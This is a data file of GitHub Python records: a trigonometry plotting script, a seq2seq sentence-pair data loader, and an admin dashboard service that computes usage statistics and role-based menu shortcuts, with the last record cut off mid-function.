{"seq_id":"32441471135","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport sympy as sp\n\n# Given sin(x) = 3/5\nsin_x = 3/5\ncos_x = np.sqrt(1 - sin_x**2)  # Calculate cos(x), assuming x lies in the first quadrant\n\n# Calculate cos(2x)\ncos_2x = cos_x**2 - sin_x**2\n\n# Create a symbolic representation for cos(2x)\nx = sp.symbols('x')\ncos_2x_symbolic = sp.cos(2*x)\n\n# Simplify cos(2x) symbolically; x = asin(3/5), so this matches the numeric value above\ncos_2x_simplified = sp.simplify(cos_2x_symbolic.subs(x, sp.asin(sin_x)))\n\n# Display the result\nprint(f'cos(2x) = {cos_2x:.2f}')\nprint(f'Simplified cos(2x) = {cos_2x_simplified}')\n\n# Create a 3D visualization\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\n# Define the angle range\ntheta = np.linspace(0, 2 * np.pi, 100)\nphi = np.linspace(0, np.pi, 100)\ntheta, phi = np.meshgrid(theta, phi)\n\n# Parametric equations for a sphere\nx = np.sin(phi) * np.cos(theta)\ny = np.sin(phi) * np.sin(theta)\nz = np.cos(phi)\n\n# Plot the sphere\nax.plot_surface(x, y, z, color='b', alpha=0.7)\n\n# Plot a point representing (cos(x), sin(x), 0)\nax.scatter([cos_x], [sin_x], [0], color='r', s=100, label='(cos(x), sin(x), 
0)')\n\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Z')\nax.legend()\n\nplt.show()\n","repo_name":"sksalahuddin2828/Data_Visualization_II","sub_path":"Simplified_cos(2x).py","file_name":"Simplified_cos(2x).py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"51"}
{"seq_id":"5638488751","text":"import glob\nimport unicodedata\nimport re\nfrom random import shuffle\n\n'''\nOnly use this function in this module below\n\nprepare_data(lang1_name, lang2_name, n_words, reverse=False)\n'''\n\n\ndef read_sentences(input_filename, target_filename, n_words, down_margin):\n    input_lines = open(input_filename).read().strip().split('\\n')\n    target_lines = open(target_filename).read().strip().split('\\n')\n    \n    targets = []\n    for i, input_line in enumerate(input_lines):\n        seq_list_len = len(input_line.split(' '))\n        if n_words - down_margin <= seq_list_len < n_words:\n            targets.append((input_line, target_lines[i]))\n\n    return targets\n\n\ndef unicode_to_ascii(s):\n    return ''.join(\n        c for c in unicodedata.normalize('NFD', s)\n        if unicodedata.category(c) != 'Mn'\n    )\n\n\ndef normalize_string(s):\n    s = unicode_to_ascii(s.lower().strip())\n    s = re.sub(r\"([.!?])\", r\" \\1\", s)\n    s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\n    return s\n\n\ndef read_langs(lang1, lang2, n_words, down_margin, reverse=False):\n    all_filenames = glob.glob('data/europarl-v*.fr-en.*')\n    print(all_filenames)\n\n    print(\"Reading lines...\")\n\n    pairs = read_sentences(all_filenames[0], all_filenames[1], n_words, down_margin)\n    # Reverse pairs, make Lang instances\n    if reverse:\n        pairs = [list(reversed(p)) for p in pairs]\n        input_lang = Lang(lang2)\n        output_lang = Lang(lang1)\n    else:\n        input_lang = Lang(lang1)\n        output_lang = Lang(lang2)\n\n    return input_lang, output_lang, pairs\n\n\ndef filter_pair(pair, func):\n    return func(pair[0]), func(pair[1])\n\n\ndef filter_pairs(pairs, func):\n    return [(filter_pair(pair, func)) for pair in pairs]\n\n\ndef split_data(data, test_ratio):\n    test_set_size = int(len(data) * test_ratio)\n    return data[:test_set_size], data[test_set_size:]\n\n\ndef prepare_data(lang1_name, lang2_name, n_words, down_margin, reverse=False):\n    input_lang, output_lang, pairs = read_langs(lang1_name, lang2_name, n_words, down_margin, reverse)\n    print(\"Read %s sentence pairs\" % len(pairs))\n\n    pairs = filter_pairs(pairs, normalize_string)\n    ret_pairs = []\n    max_input_len = 0\n    max_target_len = 0\n\n    for pair in pairs:\n        input_seq_len = len(pair[0].split(\" \"))\n        target_seq_len = len(pair[1].split(\" \"))  # measure the target side, not the input again\n        if n_words - down_margin <= input_seq_len < n_words and \\\n                n_words - down_margin <= target_seq_len < n_words:\n            ret_pairs.append(pair)\n        \n        if max_input_len < input_seq_len:\n            max_input_len = input_seq_len\n        if max_target_len < target_seq_len:\n            max_target_len = target_seq_len\n\n    print(\"Trimmed to %s sentence pairs\" % len(ret_pairs))\n\n    print(\"Indexing words...\")\n    for pair in ret_pairs:\n        input_lang.index_words(pair[0])\n        output_lang.index_words(pair[1])\n\n    print(\"Splitting sentence pairs...\")\n    test_pairs, train_pairs = split_data(ret_pairs, 0.2)\n\n    print(\"====== Total Data ======\")\n    print(\"Train Sentence pairs: \", len(train_pairs))\n    print(\"Test Sentence pairs: \", len(test_pairs))\n    print(lang1_name, 'n_words: ', input_lang.n_words, 'max_len: ', max_input_len)\n    print(lang2_name, 'n_words: ', output_lang.n_words, 'max_len: ', max_target_len)\n\n    return input_lang, output_lang, train_pairs, 
test_pairs\n\n\nclass Lang:\n    def __init__(self, name):\n        self.name = name\n        self.word2index = {\"SOS\": 0, \"EOS\": 1, \"PAD\": 2, \"UNK\": 3}\n        self.word2count = {}\n        self.index2word = {0: \"SOS\", 1: \"EOS\", 2:\"PAD\", 3:\"UNK\"}\n        self.n_words = 4 # Count SOS, EOS, PAD and UNK\n\n    def index_words(self, sentence):\n        for word in sentence.split(' '):\n            self.index_word(word)\n\n    def index_word(self, word):\n        if word not in self.word2index:\n            self.word2index[word] = self.n_words\n            self.word2count[word] = 1\n            self.index2word[self.n_words] = word\n            self.n_words += 1\n        else:\n            self.word2count[word] += 1\n","repo_name":"Taekyoon/Pytorch_Seq2Seq_Tutorial","sub_path":"data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
{"seq_id":"73300255837","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n------------------------------------------------\n\ndescribe: \n\nbase_info:\n    __author__ = \"PyGo\"\n    __time__ = \"2022/8/19 15:31\"\n    __version__ = \"v.1.0.0\"\n    __mail__ = \"gaoming971366@163.com\"\n    __blog__ = \"www.pygo2.top\"\n    __project__ = \"open2lisapi\"\n\nusage:\n\ndesign:\n\nreference urls:\n\npython version:\n    python3\n\n\nEnjoy the good life everyday!!!\nLife is short, I use python.\n\n------------------------------------------------\n\"\"\"\n\n# ------------------------------------------------------------\n# usage: /usr/bin/python dashboard.py\n# ------------------------------------------------------------\nfrom collections import OrderedDict\n\nfrom deploy.utils.utils import get_now, get_day_week_date, get_now_date, \\\n    d2s\nfrom deploy.bo.sysuser import SysUserBo\nfrom deploy.bo.request import RequestBo\nfrom deploy.bo.menu import MenuBo\nfrom deploy.bo.role import RoleBo\nfrom deploy.bo.shortcut import ShortCutBo\nfrom deploy.utils.status import Status\nfrom deploy.utils.status_msg import StatusMsgs\nfrom deploy.config import ADMIN\n\n\nMAX = 15\n\n\nclass DashboardService(object):\n    \"\"\"\n    dashboard service\n    \"\"\"\n\n    # user\n    req_user_necessary_attrs = ['rtx_id']\n\n    # data md5\n    req_md5_necessary_attrs = ['rtx_id', 'md5']\n\n    # define many request api parameters\n    # common request parameters for paginated data\n    req_page_comm_attrs = [\n        'rtx_id',\n        'limit',\n        'offset'\n    ]\n\n    req_pan_attrs = [\n        'rtx_id'\n    ]\n\n    req_pan_chart_attrs = [\n        'rtx_id',\n        'type'\n    ]\n\n    req_index_chart_attrs = [\n        'rtx_id',\n        'type'\n    ]\n\n    req_shortcut_attrs = [\n        'rtx_id'\n    ]\n\n    req_shortcut_edit_attrs = [\n        'rtx_id'\n    ]\n\n    req_shortcut_save_attrs = [\n        'rtx_id',\n        'select'\n    ]\n\n    def __init__(self):\n        \"\"\"\n        DashboardService class initialize\n        \"\"\"\n        super(DashboardService, self).__init__()\n        # bo\n        self.sysuser_bo = SysUserBo()\n        self.request_bo = RequestBo()\n        self.menu_bo = MenuBo()\n        self.role_bo = RoleBo()\n        self.shortcut_bo = ShortCutBo()\n\n    def __str__(self):\n        return \"DashboardService class\"  # __str__ must return a string, not print one\n\n    def __repr__(self):\n        return self.__str__()\n\n    def pan(self, params: dict) -> dict:\n        \"\"\"\n        dashboard pan chart data\n        contain:\n        pan:\n        - user (user count)\n        - click (click rate)\n        \"\"\"\n        # ================= parameters check and format ====================\n        if not params:\n            return Status(\n                212, 'failure', StatusMsgs.get(212), {}).json()\n        # **************************************************************************\n        \"\"\"inspect api request necessary parameters\"\"\"\n        for _attr in self.req_pan_attrs:\n            if _attr not in params.keys():\n                return Status(\n                    212, 'failure', u'缺少请求参数%s' % _attr or StatusMsgs.get(212), {}).json()\n        
\"\"\"end\"\"\"\n # **************************************************************************\n # new parameters\n new_params = dict()\n for k, v in params.items():\n if not k: continue\n if k not in self.req_pan_attrs: # illegal key\n return Status(\n 213, 'failure', u'请求参数%s不合法' % k, {}).json()\n if not v: # value is not null\n return Status(\n 214, 'failure', u'请求参数%s不允许为空' % k, {}).json()\n new_params[k] = str(v)\n # ---------------- parameter initialize ----------------\n rtx_id = new_params.get('rtx_id')\n now_date = get_now(format=\"%Y-%m-%d\")\n date_params = {\n \"start_time\": \"%s 00:00:00\" % now_date,\n \"end_time\": \"%s 23:59:59\" % now_date\n }\n # <<<<<<<<<<<<<<<< get return pan: user >>>>>>>>>>>>>>>\n # 总用户数\n # user = self.sysuser_bo.get_count() or 1\n # 当日登录用户数\n user = self.request_bo.get_user_count_by_time(date_params) or 1\n # <<<<<<<<<<<<<<<< get return pan: click >>>>>>>>>>>>>>>\n click = self.request_bo.get_req_count_by_time(date_params)\n click = click[0] if click else 1\n if click == 0: click = 1 # 防止分母为0\n # <<<<<<<<<<<<<<<< get return pan: click >>>>>>>>>>>>>>>\n \"\"\" 本日操作数 / 总的API数量\"\"\"\n operate = self.request_bo.get_req_operate_by_time(date_params)\n operate = operate[0] if operate else 0\n ret_res_json = {\n 'user': user,\n 'click': click,\n 'operate': round(operate/click * 100, 2)\n }\n # return data\n return Status(\n 100, 'success', StatusMsgs.get(100), ret_res_json\n ).json()\n\n @staticmethod\n def _pan_chart_title(chart_type: str) -> str:\n \"\"\"\n get dashboard pan chart title\n return string\n \"\"\"\n if not chart_type:\n return \"本周数据活跃情况\"\n\n if chart_type == 'user':\n return '本周用户登录情况'\n elif chart_type == 'click':\n return '本周功能点击数情况'\n elif chart_type == 'operate':\n return '本周功能使用率情况'\n else:\n return \"本周数据活跃情况\"\n\n def pan_chart(self, params: dict) -> dict:\n \"\"\"\n get dashboard pan chart data\n contain:\n - user 用户\n - click 点击率\n - operate 操作率\n \"\"\"\n # ================= parameters check and format ====================\n if not params:\n return Status(\n 212, 'failure', StatusMsgs.get(212), {}).json()\n # **************************************************************************\n \"\"\"inspect api request necessary parameters\"\"\"\n for _attr in self.req_pan_chart_attrs:\n if _attr not in params.keys():\n return Status(\n 212, 'failure', u'缺少请求参数%s' % _attr or StatusMsgs.get(212), {}).json()\n \"\"\"end\"\"\"\n # **************************************************************************\n # new parameters\n new_params = dict()\n for k, v in params.items():\n if not k: continue\n if k not in self.req_pan_chart_attrs: # illegal key\n return Status(\n 213, 'failure', u'请求参数%s不合法' % k, {}).json()\n if not v: # value is not null\n return Status(\n 214, 'failure', u'请求参数%s不允许为空' % k, {}).json()\n if k == 'type' and v not in ['user', 'click', 'operate']:\n return Status(\n 213, 'failure', u'请求参数%s值不合法' % k, {}).json()\n new_params[k] = str(v)\n # ---------------- parameter initialize ----------------\n rtx_id = new_params.get('rtx_id')\n _type = new_params.get('type')\n local_week = get_day_week_date(get_now_date())\n date_params = {\n \"start_date\": local_week.get('start_week_date'),\n \"end_date\": local_week.get('end_week_date')\n }\n if _type == 'user':\n # <<<<<<<<<<<<<<<< get return user 本周 >>>>>>>>>>>>>>>\n # 当日登录用户数 用sql进行查询\n _sql = \"\"\"\n select \n create_date, count(1)\n from (\n select \n create_date as create_date, rtx_id as rtx_id\n from request\n where create_date BETWEEN '%s' and '%s'\n group by create_date, 
rtx_id\n            )t\n            group by create_date\n            order by create_date asc\n            \"\"\" % (date_params.get('start_date'), date_params.get('end_date'))\n            ret_res = self.request_bo.execute_sql(_sql)\n        elif _type == 'click':\n            # <<<<<<<<<<<<<<<< get return click for this week >>>>>>>>>>>>>>>\n            ret_res = self.request_bo.get_req_count_by_week(date_params) or []\n        elif _type == 'operate':\n            # <<<<<<<<<<<<<<<< get return operate for this week >>>>>>>>>>>>>>>\n            \"\"\"total count\"\"\"\n            ret_res_sum = self.request_bo.get_req_count_by_week(date_params) or []\n            \"\"\"data operation count\"\"\"\n            ret_res_count = self.request_bo.get_req_operate_count_by_week(date_params) or []\n            ret_res = list()\n            _temp_list = dict()\n            # format the operation-type rows into a dict\n            for _c in ret_res_count:\n                if not _c: continue\n                _temp_list[_c[0]] = _c[1]\n            # compute the rate for each date\n            for _s in ret_res_sum:\n                if not _s: continue\n                v = _temp_list[_s[0]] if _s[0] in _temp_list.keys() else 0\n                ret_res.append((_s[0], round(v/_s[1] * 100, 2)))\n            del _temp_list\n        else:\n            ret_res = list()\n        # -------------- format data --------------\n        \"\"\"\n        1. create an ordered dict with each weekday initialized to 0\n        2. iterate over the data and update the weekday values\n        3. dump the weekday values into a list\n        4. return\n        \"\"\"\n        _ret_week_dict = OrderedDict()\n        for day in local_week.get('week_date'): # initialize data, default 0\n            if not day: continue\n            _ret_week_dict[day] = 0\n        \"\"\" ======== iterate only when ret_res is not empty ======== \"\"\"\n        if ret_res:\n            for _r in ret_res: # iterate over each row in the format: date, count\n                if not _r: continue\n                _date = _r[0]\n                if not isinstance(_date, str): # convert the date to str\n                    _date = d2s(_date, fmt=\"%Y-%m-%d\")\n                if _date in _ret_week_dict.keys(): # exists && update\n                    _ret_week_dict[_date] = _r[1]\n        # return data\n        _ret_d = {\n            'title': self._pan_chart_title(_type),\n            'subtitle': '%s ~ %s' % (local_week.get('start_week_date'), local_week.get('end_week_date')),\n            'data': list(_ret_week_dict.values())\n        }\n        return Status(\n            100, 'success', StatusMsgs.get(100), _ret_d\n        ).json()\n\n    def _get_index_one(self):\n        \"\"\"\n        Index 1: cumulative usage of system features\n        \"\"\"\n        func_names = {\n            'office.excel_merge': \"表格合并\",\n            'office.excel_split': \"表格拆分\",\n            'office.office_pdf_to': \"PDF转WORD\",\n            'notify.dtalk_send': \"钉钉绩效\",\n            'notify.qywx_send': \"企微通知\",\n            'search.sqlbase_add': \"SQL仓库\"\n        }\n        # <<<<<<<<<<<<<<<<<< get all func rank >>>>>>>>>>>>>>>>>>>\n        _res = self.request_bo.get_func_rank(params={'func_names': list(func_names.keys())})\n        _ret_dict = OrderedDict()\n        for key in func_names.keys(): # initialize data, default 0\n            if not key: continue\n            _ret_dict[key] = 0\n        \"\"\" ======== iterate only when ret_res is not empty ======== \"\"\"\n        if _res:\n            for _r in _res: # iterate over each row in the format: date, count\n                if not _r: continue\n                if _r and _r[0] not in func_names.keys(): continue\n                _k = _r[0]\n                _ret_dict[_k] = _r[1] # exists && update\n        _ret_res = list()\n        for k, v in _ret_dict.items():\n            if not k: continue\n            _ret_res.append({\"name\": func_names.get(k), \"value\": v})\n        _ret_data = {\n            'data': _ret_res,\n            'legend': list(func_names.values()),\n            'title': '工具累积使用排名TOP%s' % len(func_names)\n        }\n        return _ret_data\n\n    def _get_index_three(self):\n        \"\"\"\n        Index 3: this week's API request leaderboard\n        \"\"\"\n        # APIs excluded from the leaderboard\n        no_show_endpoint = [\n            'user.auth'\n        ]\n        # maximum number of entries to show\n        SHOW_INDEX_MAX = 5\n        api_endpoints = list()\n        # dates of the current week\n        local_week = get_day_week_date(query_date=get_now(format=\"%Y-%m-%d\"))\n        params = {\n            'start_time': '%s 00:00:00' % local_week.get('start_week_date'),\n            'end_time': '%s 23:59:59' % local_week.get('end_week_date')\n        }\n        # <<<<<<<<<<<<<<<<<<<< get all func rank: fetch the most-requested APIs this week >>>>>>>>>>>>>>>>>>>>>>\n        api_res = self.request_bo.get_func_rank(params=params)\n        start = 0\n        for _d in api_res:\n            \"\"\"\n            continue:\n            - no data \n            - excluded api endpoint\n            - dashboard.%\n            
\"\"\"\n if not _d or _d[0] in no_show_endpoint \\\n or str(_d[0]).startswith('dashboard.'): continue\n api_endpoints.append(_d[0])\n start += 1\n if start >= SHOW_INDEX_MAX:\n break\n\n # <<<<<<<<<<<<<<<<<<<< 获取指定API本周次数 >>>>>>>>>>>>>>>>>>>>>>\n params['func_names'] = api_endpoints\n _res = self.request_bo.get_func_rank_group_by_api_date(params=params)\n _ret_dict = OrderedDict()\n for _d in api_endpoints: # 初始化数据,默认为0\n if not _d: continue\n _ret_dict[_d] = [0, 0, 0, 0, 0, 0, 0] # 本周数据初始化0\n \"\"\" ======== 在ret_res不为空情况下进行遍历 ======== \"\"\"\n if _res:\n week_dates = local_week.get('week_date') # 本周日期的列表,用于记录哪一天\n for _r in _res: # 遍历每一个指定格式数据:date count\n if not _r: continue\n if _r[0] not in api_endpoints: continue\n index = week_dates.index(d2s(_r[1], fmt=\"%Y-%m-%d\")) # 记录索引,代表周一 ~ 周末 下角标\n try:\n if index > 7: continue # 不是本周的数据\n except:\n continue\n _ret_dict[_r[0]][index] = _r[2] # api endpoint -> date -> update\n _ret_list = list()\n for api in api_endpoints:\n if not api: continue\n _ret_list.append(_ret_dict.get(api))\n # 按API顺序加载\n _ret_res = {\n 'data': _ret_list,\n 'legend': api_endpoints,\n 'title': '本周API请求次数排名TOP%s' % SHOW_INDEX_MAX,\n 'subtitle': '%s ~ %s' % (local_week.get('start_week_date'), local_week.get('end_week_date'))\n }\n return _ret_res\n\n def index(self, params: dict) -> dict:\n \"\"\"\n dashboard index chart data initialize\n 指标数据 contain:\n index one 指标一:工具累积使用情况\n index two 指标二:\n index three 指标三:本周API请求排行榜\n \"\"\"\n # ================= parameters check and format ====================\n if not params:\n return Status(\n 212, 'failure', StatusMsgs.get(212), {}).json()\n # **************************************************************************\n \"\"\"inspect api request necessary parameters\"\"\"\n for _attr in self.req_index_chart_attrs:\n if _attr not in params.keys():\n return Status(\n 212, 'failure', u'缺少请求参数%s' % _attr or StatusMsgs.get(212), {}).json()\n \"\"\"end\"\"\"\n # **************************************************************************\n # new parameters\n new_params = dict()\n for k, v in params.items():\n if not k: continue\n if k not in self.req_index_chart_attrs: # illegal key\n return Status(\n 213, 'failure', u'请求参数%s不合法' % k, {}).json()\n if not v: # value is not null\n return Status(\n 214, 'failure', u'请求参数%s不允许为空' % k, {}).json()\n new_params[k] = str(v)\n # ---------------- parameter initialize ----------------\n rtx_id = new_params.get('rtx_id')\n _type = new_params.get('type')\n ret_res_json = list()\n # <<<<<<<<<<<<<<<< get return index: 功能使用率 >>>>>>>>>>>>>>>\n if _type == '1':\n ret_res_json = self._get_index_one()\n elif _type == '2':\n pass\n elif _type == '3':\n ret_res_json = self._get_index_three()\n else:\n pass\n\n # return data\n return Status(\n 100, 'success', StatusMsgs.get(100), ret_res_json\n ).json()\n\n def shortcut(self, params: dict) -> dict:\n \"\"\"\n dashboard short cut data\n :return: json data\n\n 根据用户的角色权限,展示二级菜单快捷入口。\n 思路:\n 1.参数check and format\n 2.获取全部菜单\n 3.shortcut数据获取\n 4.依据是否有shortcut数据进行情况判断\n 4.1 有:直接格式化数据返回\n 4.2 无:\n 4.2.1 用户数据与用户权限数据check\n 4.2.2 只取二级菜单 && 在权限id集合的菜单,如果shortcut为空,展示所有数据\n 最多15个\n\n 之所以这么做的原因在于如果设置了shortcut可以直接格式化数据进行返回,省去每次都需要判断用户、角色的情况\n \"\"\"\n # ================= 1 - parameters check and format ====================\n if not params:\n return Status(\n 212, 'failure', StatusMsgs.get(212), {}).json()\n # **************************************************************************\n \"\"\"inspect api request necessary parameters\"\"\"\n for _attr in 
self.req_shortcut_attrs:\n            if _attr not in params.keys():\n                return Status(\n                    212, 'failure', u'缺少请求参数%s' % _attr or StatusMsgs.get(212), {}).json()\n        \"\"\"end\"\"\"\n        # **************************************************************************\n        # new parameters\n        new_params = dict()\n        for k, v in params.items():\n            if not k: continue\n            if k not in self.req_shortcut_attrs:  # illegal key\n                return Status(\n                    213, 'failure', u'请求参数%s不合法' % k, {}).json()\n            if not v:  # value is not null\n                return Status(\n                    214, 'failure', u'请求参数%s不允许为空' % k, {}).json()\n            new_params[k] = str(v)\n\n        # >>>>>>>>> define the result data\n        count = 0   # show at most 15 shortcut menus\n        ret_res_json = []\n        rtx_id = new_params.get('rtx_id').strip()   # strip whitespace\n\n        # -------------------- 2 - menu --------------------\n        \"\"\"used to join with the second-level menus\"\"\"\n        _res = self.menu_bo.get_all(root=False)\n        # first-level menus [id-path]\n        _one_level_menu = dict()\n        for _r in _res:\n            if not _r: continue\n            if _r.level != 1: continue\n            _one_level_menu[_r.id] = _r.path\n        # -------------------- 3 - user shortcut --------------------\n        shortcut = self.shortcut_bo.get_model_by_rtx(rtx_id)\n        shortcut_list = list()\n        if shortcut and shortcut.shortcut:\n            shortcut_list = [int(x) for x in shortcut.shortcut.split(';') if x]\n        # -------------------- 4 - branch on whether shortcut data exists --------------------\n        \"\"\" <<<<<<<<<<<<<<<<<<<<<<<<<<< case one >>>>>>>>>>>>>>>>>>>>>>>>>>>\"\"\"\n        if shortcut_list:\n            for _r in _res:\n                \"\"\" filter out empty rows / root nodes / first-level menus / menus not shown as shortcuts\"\"\"\n                if not _r: continue\n                if _r.level != 2: continue  # drop root and first-level menus, keep only second-level ones\n                if not _r.is_shortcut: continue     # drop menus configured not to show as shortcuts\n                if int(_r.id) in shortcut_list:\n                    count += 1\n                    ret_res_json.append({\n                        'name': _r.title,\n                        'icon': _r.icon,\n                        'path': \"%s/%s\" % (_one_level_menu.get(_r.pid), _r.path)\n                    })\n                if count >= MAX:\n                    break\n            # return data\n            return Status(\n                100, 'success', StatusMsgs.get(100), ret_res_json).json()\n\n        \"\"\" <<<<<<<<<<<<<<<<<<<<<<<<<<< case two >>>>>>>>>>>>>>>>>>>>>>>>>>>\"\"\"\n        # -------------------- 4.2.1 - check user and roles --------------------\n        # get user by rtx\n        user = self.sysuser_bo.get_auth_by_rtx(rtx_id)\n        # user model is not exist\n        if not user:\n            return Status(\n                202, 'failure', StatusMsgs.get(202) or u'用户未注册', {}).json()\n        # user model is deleted\n        if user.is_del:\n            return Status(\n                203, 'failure', StatusMsgs.get(203) or u'用户已注销', {}).json()\n        # check whether the user is an admin; admins get all menu permissions\n        # multiple roles: if they include admin, use admin permissions directly\n        roles = str(user.role).split(';') if user.role else []  # split multiple roles\n        is_admin = True if ADMIN in roles \\\n            else False\n        auth_list = list()\n        if not is_admin:\n            # get authority by role list\n            # user is admin, not get role, all authority menu\n            role_models = self.role_bo.get_models_by_engnames(roles)\n            for _r in role_models:\n                if not _r or not _r.authority: continue\n                auth_list.extend([int(x) for x in _r.authority.split(';') if x])\n            auth_list = list(set(auth_list))    # deduplicate\n            # auth_list.sort()  # sort\n        # --------------- 4.2.2.return legal data ---------------\n        for _r in _res:\n            \"\"\" filter out empty rows / root nodes / first-level menus / menus not shown as shortcuts\"\"\"\n            if not _r: continue\n            if _r.level != 2: continue  # drop root and first-level menus, keep only second-level ones\n            if not _r.is_shortcut: continue     # drop menus configured not to show as shortcuts\n            if is_admin:    # has the admin role\n                count += 1\n                ret_res_json.append({\n                    'name': _r.title,\n                    'icon': _r.icon,\n                    'path': \"%s/%s\" % (_one_level_menu.get(_r.pid), _r.path)\n                })\n            elif int(_r.id) in auth_list:   # user permission\n                count += 1\n                ret_res_json.append({\n                    'name': _r.title,\n                    'icon': _r.icon,\n                    'path': \"%s/%s\" % (_one_level_menu.get(_r.pid), _r.path)\n                })\n            if count >= MAX:\n                break\n        # return data\n        return Status(\n            100, 'success', 
StatusMsgs.get(100), ret_res_json).json()\n\n    def shortcut_edit(self, params: dict) -> dict:\n        \"\"\"\n        dashboard short cut edit data list\n        :return: json data\n\n        1. parameter check && new parameter formatting\n        2. check the user's roles and fetch the role permission data\n        3. shortcut data\n        4. all menu data\n        5. group by the shortcut data and return two sets: UnSelect (not selected) and Select (selected)\n        condition: in the shortcut list && in the role permissions\n        \"\"\"\n        # ================= 1 - parameters check and format ====================\n        if not params:\n            return Status(\n                212, 'failure', StatusMsgs.get(212), {}).json()\n        # **************************************************************************\n        \"\"\"inspect api request necessary parameters\"\"\"\n        for _attr in self.req_shortcut_edit_attrs:\n            if _attr not in params.keys():\n                return Status(\n                    212, 'failure', u'缺少请求参数%s' % _attr or StatusMsgs.get(212), {}).json()\n        \"\"\"end\"\"\"\n        # **************************************************************************\n        # new parameters\n        new_params = dict()\n        for k, v in params.items():\n            if not k: continue\n            if k not in self.req_shortcut_edit_attrs:  # illegal key\n                return Status(\n                    213, 'failure', u'请求参数%s不合法' % k, {}).json()\n            if not v:  # value is not null\n                return Status(\n                    214, 'failure', u'请求参数%s不允许为空' % k, {}).json()\n            new_params[k] = str(v)\n        # -------------------- 2 - check user data and roles --------------------\n        rtx_id = new_params.get('rtx_id').strip()   # strip whitespace\n        # get user by rtx\n        user = self.sysuser_bo.get_auth_by_rtx(rtx_id)\n        # user model is not exist\n        if not user:\n            return Status(\n                202, 'failure', StatusMsgs.get(202) or u'用户未注册', {}).json()\n        # user model is deleted\n        if user.is_del:\n            return Status(\n                203, 'failure', StatusMsgs.get(203) or u'用户已注销', {}).json()\n        # check whether the user is an admin; admins get all menu permissions\n        # multiple roles: if they include admin, use admin permissions directly\n        roles = str(user.role).split(';') if user.role else []  # split multiple roles\n        is_admin = True if ADMIN in roles \\\n            else False\n        auth_list = list()\n        if not is_admin:\n            # get authority by role list\n            # user is admin, not get role, all authority menu\n            role_models = self.role_bo.get_models_by_engnames(roles)\n            for _r in role_models:\n                if not _r or not _r.authority: continue\n                auth_list.extend([int(x) for x in _r.authority.split(';') if x])\n            auth_list = list(set(auth_list))    # deduplicate\n        # -------------------- 3 - user shortcut --------------------\n        shortcut = self.shortcut_bo.get_model_by_rtx(rtx_id)\n        shortcut_list = list()\n        # data exists only if a shortcut has been set\n        if shortcut and shortcut.shortcut:\n            shortcut_list = [int(x) for x in shortcut.shortcut.split(';') if x]\n        # -------------------- 4 - menu --------------------\n        \"\"\"used to join with the second-level menus\"\"\"\n        _res = self.menu_bo.get_all(root=False)\n        # first-level menus [stores only id-title]\n        _one_level_menu = dict()\n        for _r in _res:\n            if not _r: continue\n            if _r.level != 1: continue\n            _one_level_menu[_r.id] = _r.title or _r.name\n        # --------------- 5.return UnSelect && Select ---------------\n        select = list()\n        unselect = list()\n        # >>>>>>>>>>>>> menu data filtering\n        for _r in _res:\n            \"\"\" filter out empty rows / root nodes / first-level menus / menus not shown as shortcuts\"\"\"\n            if not _r: continue\n            if _r.level != 2: continue  # drop root and first-level menus, keep only second-level ones\n            if not _r.is_shortcut: continue     # drop menus configured not to show as shortcuts (admin setting)\n            \"\"\"\n            TODO: add a role-permission check here\n            a menu falls into exactly 2 cases:\n            1. select (already selected):\n                add the item to select\n            2. unselect (not selected)\n            2.1 if admin, add everything to unselect\n            2.2 if not admin, check the role permission and add to unselect when present\n            \"\"\"\n            _d = {\n                \"id\": _r.id,    # menu id\n                \"icon\": _r.icon,    # menu icon\n                \"name\": \"%s > %s\" % (_one_level_menu.get(_r.pid), _r.title or _r.name)  # menu path: first-level menu > second-level menu\n            }\n            if int(_r.id) in shortcut_list:\n                select.append(_d)\n            else:\n                if is_admin:    # has the admin role\n                    unselect.append(_d)\n                elif not is_admin and int(_r.id) in auth_list:  # user-configured permission\n                    
unselect.append(_d)\n                else:   # otherwise do not add\n                    pass\n        # return data\n        return Status(\n            100, 'success', StatusMsgs.get(100),\n            {\"select\": select, \"unselect\": unselect}\n        ).json()\n\n    def shortcut_save(self, params: dict) -> dict:\n        \"\"\"\n        dashboard short cut edit data save\n        :return: json data\n\n        1. parameter check && formatting\n        2. user data check && role permissions\n        3. shortcut data\n        3.1 create\n        3.2 edit\n        \"\"\"\n        # ================= 1 - parameters check and format ====================\n        if not params:\n            return Status(\n                212, 'failure', StatusMsgs.get(212), {}).json()\n        # **************************************************************************\n        \"\"\"inspect api request necessary parameters\"\"\"\n        for _attr in self.req_shortcut_save_attrs:\n            if _attr not in params.keys():\n                return Status(\n                    212, 'failure', u'缺少请求参数%s' % _attr or StatusMsgs.get(212), {}).json()\n        \"\"\"end\"\"\"\n        # **************************************************************************\n        # new parameters\n        new_params = dict()\n        for k, v in params.items():\n            if not k: continue\n            if k not in self.req_shortcut_save_attrs:  # illegal key\n                return Status(\n                    213, 'failure', u'请求参数%s不合法' % k, {}).json()\n            if not v:  # value is not null\n                return Status(\n                    214, 'failure', u'请求参数%s不允许为空' % k, {}).json()\n            if k == 'select':\n                if not isinstance(v, list):     # type check for the select parameter\n                    return Status(\n                        213, 'failure', u'请求参数%s类型必须是List' % k, {}).json()\n                if len(v) > 15:     # length check for the select parameter, at most 15 entries\n                    return Status(\n                        213, 'failure', u'超出设置上限,最多设置15个', {}).json()\n                new_params[k] = ';'.join(v)     # store formatted as a string\n                new_params['select_list'] = v\n            else:\n                new_params[k] = str(v).strip()\n\n        rtx_id = new_params.get('rtx_id').strip()   # strip whitespace\n        # -------------------- 2 - check user and roles --------------------\n        # get user by rtx\n        user = self.sysuser_bo.get_auth_by_rtx(rtx_id)\n        # user model is not exist\n        if not user:\n            return Status(\n                202, 'failure', StatusMsgs.get(202) or u'用户未注册', {}).json()\n        # user model is deleted\n        if user.is_del:\n            return Status(\n                203, 'failure', StatusMsgs.get(203) or u'用户已注销', {}).json()\n        # check whether the user is an admin; admins get all menu permissions\n        # multiple roles: if they include admin, use admin permissions directly\n        roles = str(user.role).split(';') if user.role else []  # split multiple roles\n        is_admin = True if 